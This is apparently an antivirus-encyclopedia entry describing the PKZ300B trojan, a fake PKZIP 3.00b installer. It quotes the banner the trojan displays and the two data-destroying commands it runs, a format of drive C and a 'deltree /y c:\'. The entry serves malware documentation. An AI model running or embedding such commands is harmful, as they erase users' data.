PKZ300b

The trojan named PKZIP300 was discovered in the wild. That trojan is distributed as self-extracting archive named PKZ300B.EXE, 178981 bytes of length. There is only one file that is the trojan - PKZINST.EXE. It was written in TurboPascal. Being executed it displays the message:

PKZIP (R) Install Utility Version 3.00b 4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.

Initializing, this may take a few minutes....

and executes two commands:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c:\ > NULL

Fortunately, the author of that trojan hasn't enough of computer knowledge, and the first command just waits for DOS confirmation:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?